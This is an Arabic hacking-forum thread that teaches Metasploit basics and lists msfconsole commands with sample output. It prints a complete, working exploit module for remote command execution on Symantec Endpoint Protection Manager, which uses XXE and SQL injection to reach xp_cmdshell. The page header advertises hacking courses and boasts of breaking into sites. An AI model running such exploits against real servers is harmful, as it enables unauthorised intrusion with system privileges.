1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

الموضوع في 'أختبار الأختراق - Penetration Testing' بواسطة or0, بتاريخ ‏4 مارس 2014.

كاتب الموضوع : or0 المشاهدات : 1,890 الردود : 7 ‏4 مارس 2014
حالة الموضوع:
مغلق
  1. غير متصل

    or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    IQ_tema











    السلام عليكم ورحمه الله وبركاته ...​


    1- تحميل الميتا سبوليت للويندوز واللينكس .
    2- دروس في الميتا سبلويت .
    3- كتابين لـ تعليم Metasploit .


    اولا : تحميل الميتا سبلويت للويندوز واللينكس :

    قبل ان نبدأ الدروس , عليك ان تمتلك الميتا سبلويت للتعويد على كتابة الاوامر والادوات داخل الميتا سبلويت , فقبل كل شيء قم بتحميل اخر اصدار للميتا سبلويت 4.8.2 :

    1- لنظام الويندوز :
    من الرابط :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    2-لنظام اللينكس :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    3- لنظام اللينكس 64 بت :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    ويمكنك الدخول على الرابط التالي للتأكد من وجود اصدار جديد , علما ان هذا الاصدار اخر مرة تحقق منه في تاريخ 2014-2-20 :
    رابط :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]




    ثانيا : دروس تعليمية للميتا سبلويت :

    مقدمة ومفاهيم عن الميتا سبلويت :

    الـ ميتا سبوليت Metasploit Framework :

    الميتا سبلويت هي Framework مشروع بدأ في سنة 2003 , وقد شهد تطورات تدريجية من ذلك الوقت لحد الان , وتحتوي الميتا سبلويت على العديد من ثغرات لفحص الانظمة والشبكات العديدة والانواع الاخرى من الثغرات .
    والميتا سبلويت هو مشروع قوي جدا , ومساعد القراصنة على فحص الانظمة والشبكات واكتشاف الثغرات .
    وقد جعل الكثير من القراصنة استغلاله في اختراق الاجهزة والسيرفرات من خلال استغلال ثغرات الانظمة والثغرات الاخرى المكتشفة في الميتا سبوليت .
    وايضا الميتا سبلوت تمكن المستخدمين من اضافة ثغرات جديدة للمشروع لأطلاقها في اصدارات جديدة للمشروع .
    والميتا سبلويت بأختصار " اختبار الاختراق للاجهزة والشبكات والانظمة والخوادم و الفحوصات العامة في الويب وعالم الثغرات والاختراق ..."

    وتستخدم الميتا سبلويت لغة البيرل والبايثون وغيرها من اللغات لصنع الثغرات واستغلالها , ويوجد الكثير من ثغرات الميتا سبلويت الموجودة في موقع exploit-db , مثال لثغرة موجودة في الميتا سبلويت :
    اسم الثغرة : Symantec Endpoint Protection Manager - Remote Command Execution

    كود الثغرة :
    كود:
    require 'msf/core'
    require 'msf/core/exploit/powershell'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include REXML
      include Msf::Exploit::CmdStagerVBS
      include Msf::Exploit::Remote::HttpClient
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
          'Description'    => %q{
            This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
            versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
            can reach SQL injection affected components. As xp_cmdshell is enabled in the included
            database instance, it's possible to execute arbitrary system commands on the remote system
            with SYSTEM privileges.
          },
          'Author'         =>
            [
              'Stefan Viehbock', # Discovery
              'Chris Graham', # PoC exploit
              'xistence <xistence[at]0x90.nl>' # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2013-5014' ],
              [ 'CVE', '2013-5015' ],
              [ 'EDB', '31853'],
              [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
            ],
          'Arch'           => ARCH_X86,
          'Platform'       => 'win',
          'Targets'        =>
            [
              ['Windows VBS Stager', {}]
            ],
          'Privileged'     => true,
          'DisclosureDate' => 'Feb 24 2014',
          'DefaultTarget'  => 0))
     
        register_options(
          [
            Opt::RPORT(9090),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ], self.class)
      end
     
      def check
        res = send_request_cgi(
          {
            'uri'   =>  normalize_uri(target_uri.path),
            'method' => 'GET',
          })
     
        if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
          return Exploit::CheckCode::Appears
        end
     
        Exploit::CheckCode::Safe
      end
     
      def exploit
        print_status("#{peer} - Sending payload")
        # Execute the cmdstager, max length of the commands is ~3950
        execute_cmdstager({:linemax => 3950})
      end
     
      def execute_command(cmd, opts = {})
        # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
        command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
     
        # Generate random 'xx032xxxx' sequence number.
        seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
     
        soap = soap_request(seqnum, command)
     
        post_data = Rex::MIME::Message.new
        post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
        xxe = post_data.to_s
     
        res = send_request_cgi(
          {
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => { 'ActionType' => 'ConsoleLog' },
            'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
            'data' => xxe,
          })
     
        if res and res.body !~ /ResponseCode/
          fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
        end
      end
     
      def soap_request(seqnum, command)
        randpayload = rand_text_alpha(8+rand(8))
        randxxe = rand_text_alpha(8+rand(8))
        entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
        entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
     
        xml = Document.new
        xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
        xml.add_element("Request")
        xxe = xml.root.add_element(randxxe)
        xxe.text = "PAYLOAD"
     
        xml_s = xml.to_s
        xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
        xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
     
        xml_s
      end
     
    end
    هذا الكود عبارة عن تعليمات برمجية مكتوبة بأحد لغات البرمجة , وتستخدم في الميتا سبلويت لآستغلال السيرفرات المصابة بهذه الثغرة .

    ويمكنك انت بنفسك صنع وكتابة ثغرات ونشرها في مشروع الميتا سبلوت .



    الاكواد والاوامر الاساسية في الميتا سبلوت :

    0- كود اظهار التفاصيل في الميتا سبلويت :
    كود:
    Msfconsole
    1- كود اظهار جميع الثغرات الموجودة في الميتا سبلويت :
    كود:
    show exploits
    2- كود اظهار البايلود في الميتا سبلويت :
    كود:
    show payloads
    * البايلود هو اظهار صلاحيات الثغرة .

    3- كود اظهار ثغرات الفحص :
    كود:
    show auxiliary 
    *ثغرات الفحص المقصود بها هي اظهار ثغرات الي تفحص البورتات والمنافذ للاجهزة والسيرفرات وثغرات الفحص الاخرى .

    4- كود استخدام ثغرة او بايلود :
    كود:
    use
    *يستخدم هذا الكود لأستخدام ثغرة مثلا :
    كود:
    use aplof\temp\exploit\tag
    ومعناها استخدم هذه الثغرة : aplof\temp\exploit\tag

    5- كود ضبط الاوامر والتعديل على خيارات الثغرة :
    كود:
    set
    مثال :
    كود:
    set LHOST 129.168.1.100
    ومعناه ضبط الـ Local Host الخاص بالـ يبي الجهاز , وممكن ضبط البورت ايضا وهناك اعدادات للضبط , وجميع الاعدادات بسيطة .
    6- كود اظهار الخيارات :
    كود:
    show options 
    * اظهار خيارات الثغرة , او خيارات الاعدادات او ... .

    7- كود اظهار ثغرات التشفير :
    كود:
    show encoders
    8- كود اظهار ألـنوبس :
    كود:
    show nops 
    * يستخدم لغرض عرض مكونات او مولدات الـnops .

    9- اكواد اخرى سريعة لا داعي لشرحها فقط معرفة بالانجليزية للكلمات , ومنقولة من كتاب صانعي مشروع الميتا سبلويت :
    كود:
       Command               Description                                         
       -------               -----------                                         
       db_add_host           Add one or more hosts to the database               
       db_add_note           Add a note to host                                  
       db_add_port           Add a port to host                                  
       db_autopwn            Automatically exploit everything                    
       db_hosts              List all hosts in the database                      
       db_import_nessus_nbe  Import a Nessus scan result file (NBE)              
       db_import_nmap_xml    Import a Nmap scan results file (-oX)               
       db_nmap               Executes nmap and records the output automatically  
       db_notes              List all notes in the database                      
       db_services           List all services in the database                   
       db_vulns              List all vulnerabilities in the database
    10- كود الرجوع :
    كود:
    back
    11- كود العرض والمشاهدة في الرئيسية :
    كود:
    banner
    مثال :
    كود:
    msf > banner
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    12- كود التحقق :
    كود:
    check
    مثأل :
    كود:
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    
    13- كود ضبط اللون :
    كود:
    color
    مثال :
    كود:
    msf > banner
    Usage: color <'true'|'false'|'auto'>
    
    Enable or disable color output.
    14- كود الاتصال :
    كود:
    connect
    * يتم عبر الايبي والبورت , مثال :
    كود:
    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    15- كود اظهار المعلومات :
    كود:
    info
    * يستخدم لآظهار المعلومات او معلومات الثغرة , مثال :
    كود:
    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie 
      hdm 
      sf 
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    16 - كود استيراد الاضافات :
    كود:
    load
    مثال :
    كود:
    msf > load
    Usage: load <path> [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    
    17- كود استيراد اضافات في المسارات :
    كود:
    loadpath
    مثال :
    كود:
    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    18- كود عدم الاستيراد :
    كود:
    unload
    مثال :
    كود:
    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    19- كود التعديل والسماح والضبط في الـ Socks والـ Session :
    كود:
    route
    مثال :
    كود:
    meterpreter > route -h
    Usage: route [-h] command [args]
    
    Display or modify the routing table on the remote machine.
    
    Supported commands:
    
       add    [subnet] [netmask] [gateway]
       delete [subnet] [netmask] [gateway]
       list
    
    meterpreter >
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    
    20- كود البحث :
    كود:
    Search
    مثال :
    كود:
    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    
    msf >
    21- كود المساعدة :
    كود:
    Help
    مثال :
    كود:
    msf > help search
    Usage: search [keywords]
    
    Keywords:
      name      :  Modules with a matching descriptive name
      path      :  Modules with a matching path or reference name
      platform  :  Modules affecting this platform
      type      :  Modules of a specific type (exploit, auxiliary, or post)
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      cve       :  Modules with a matching CVE ID
      bid       :  Modules with a matching Bugtraq ID
      osvdb     :  Modules with a matching OSVDB ID
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    22- كود البحث بواسطة الاسم :
    كود:
    Name
    مثال :
    كود:
    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf > 
    23- كود البحث بواسطة المسار :
    كود:
    Path
    مثال :
    كود:
    msf > search path:scada
    
    Matching Modules
    ================
    
       Name                                                 Disclosure Date  Rank     Description
       ----                                                 ---------------  ----     -----------
       auxiliary/admin/scada/igss_exec_17                   2011-03-21       normal   Interactive Graphical SCADA System Remote Command Injection
       exploit/windows/scada/citect_scada_odbc              2008-06-11       normal   CitectSCADA/CitectFacilities ODBC Buffer Overflow
    ...snip...
    24- كود فلترة نوع البحث حسب النوع :
    كود:
    type
    مثال :
    كود:
    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    25- كود البحث بواسطة الصانع للثغرة :
    كود:
    author
    مثال :
    كود:
    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...

    شرح اداة Nmap :
    اداة Nmap هي اداة لعمل فحص كامل للموقع المستهدف او السيرفر او الجهاز .

    وأهم المهمات التي تستعمل في هذه الاداة هي :
    1- معرفة البورتات المفتوحة .
    2- معرفة معلومات النظام .
    3- معرفة البرامج الموجودة على السيرفر والبورت الذي يعمل عليه .
    4- وعمل فحص كامل لباقي المعلومات .

    ولمعرفة طريقة استعمال هذه الاداة اكتب في موجه الاوامر للميتا سبلويت الأمر التالي :
    كود:
    Info nmap

    كتابين pdf لـ Metasploit :



    1- كتاب Metasploit User Guide 3.2 :
    الاصدار : 3.2
    الصيغة :pdf
    الكتاب مهم ومفيد وهو الكتاب الرسمي من صانعي الميتا سبلويت .
    التحميل :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]





    2- كتاب Metasploit Guide :
    هو كتاب يشرح استخدام الاوامر والثغرات مع تطبيقات على ثغرات في الميتا سبلويت , هو كتاب مفيد لزيادة التعليم في الميتا سبلويت :
    الكتاب بصيغة pdf
    تحميله من الرابط التالي :
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]




    كنت ارغب في زيادة الدروس , واعتذر لقلتها , وشكرا للمتابعة وحظ موفق في تعليم الميتا سبلويت .

    سلام .​
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم ألسلام و رحمة الله و بركلتة .
    شرح ممتاز. عزيزي . بارك الله فيك .
    بس ينقل الى القسم الصحيح . ( اختبار الاختراق ).
     


  3. غير متصل

    or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit


    شكرا للنقل .. كنت ابحث عن قسم اختبار الاختراق لكن لا اعرف لم الاحظه .

    على اي حال شكرا وبارك الله فيك ...
     


  4. غير متصل

    CoMmAnDo AlMaSaBi
    DeveloPer Plus

    عضو منذ:
    ‏13 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم السلام
    بارك الله فيك اخي
    )5:")5:"
     


  5. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     


  6. غير متصل

    ρяoғеѕoя
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    موضوع في قمة الخيااال
    طرحت فابدعت
    دمت ودام عطائك
    ودائما بأنتظار جديدك الشيق :{1}:
     


  7. غير متصل

    or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit



    شكرا ليكم ع المرور ....
    تحياتي .. !
     


  8. غير متصل

    Murtadha Albejawe
    rankrank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تسلم على الشرح الرائع
    بارك الله فيك اخي !:"​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...